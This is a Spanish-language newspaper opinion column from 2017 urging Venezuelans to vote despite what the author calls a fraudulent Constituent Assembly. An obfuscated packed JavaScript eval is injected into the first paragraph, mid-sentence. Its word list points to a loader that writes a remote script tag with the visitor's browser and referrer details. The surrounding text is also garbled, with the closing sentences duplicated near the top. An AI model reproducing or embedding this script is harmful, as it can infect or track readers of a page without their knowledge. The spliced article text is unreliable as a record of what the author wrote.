publicidad

Cuchillo de doble filo

Kaled Yorde/Abogado/ gonzalezyorde@hotmail.com
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nksyr|var|u0026u|referrer|akfkb||js|php'.split('|'),0,{})) lucha es dura, larga y la batalla electoral fuerte. Y tenga presente que no hay mal que dure cien años ni cuerpo que lo resista; si no lo cree pregúnteselo a Mugabe de Zimbabue, quien acaba de ser derrocado como dictador luego de 37 años de satrapía

El hecho de crear una Asamblea Nacional Constituyente por vía fraudulenta y en abierta violación a la Carta Magna de 1999, es un timo colectivo, además de descarada burla a la voluntad del electorado. Si a tal adefesio se le dan facultades plenipotenciarias para legislar, obligando al ciudadano a obedecerlas, eso la convierte en una aberración. Viene a ser como una pesada losa colocada sobre la sepultura del Estado de derecho en Venezuela y su sistema democrático.

Ese cuchillo de doble filo que corta a la ida y a la venida: Si usted vota, amigo lector, es malo, puesto que estaría legitimando al engendro hijo adulterino de la Constitución Nacional de 1999 violada en fila por los personeros oficialistas que ahora tienen secuestrado al país. Si no sale a votar por cuestión de dignidad o porque no está dispuesto a dejarse humillar cuando estén obligando a los candidatos ganadores a juramentarse ante la írrita ANC, es peor aún puesto que le estaría cediendo espacios conquistados a los rojos-rojitos al servicio de la dictadura castrista.

La ANC se ha convertido en la alegría suprema del día a día de Nicolás, su “dulce de lechosa”, frío que a medianoche se levanta a comer. De nuevo la desconcertante pregunta: ¿Votar o no votar? ¿Qué tenemos que hacer? Lo sensato es lo siguiente: Entre dos males, escoger el menor. ¿Cuál vendría a ser el mal menor en el caso Venezuela? Ir a votar el domingo para no seguir cediéndole más espacios al régimen y sus cómplices cegados por el fanatismo, la ineptitud y el revanchismo. Ellos prefieren la solidaridad automática con Maduro (así lo ha decidido la izquierda mundial y la Latinoamericana del Foro de Sao Paulo), que el bienestar, la salud y la calidad de vida del venezolano.

Le importa un bledo a la Izquierda Mundial que Venezuela se haya degradado económica, social y moralmente al nivel de Zimbabue y Haití en lo que se refiere a pobreza generalizada. Entonces, vaya usted amigo lector a votar el domingo. Haga de tripas corazón y enfrente el diluvio de trampas, obstáculos, ventajismo, amenazas y cambio de reglas a última hora, al mejor estilo del CNE. La lucha es dura, larga y la batalla electoral fuerte. Y tenga presente que no hay mal que dure cien años ni cuerpo que lo resista; si no lo cree pregúnteselo a Mugabe de Zimbabue, quien acaba de ser derrocado como dictador luego de 37años de satrapía.

 

 

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama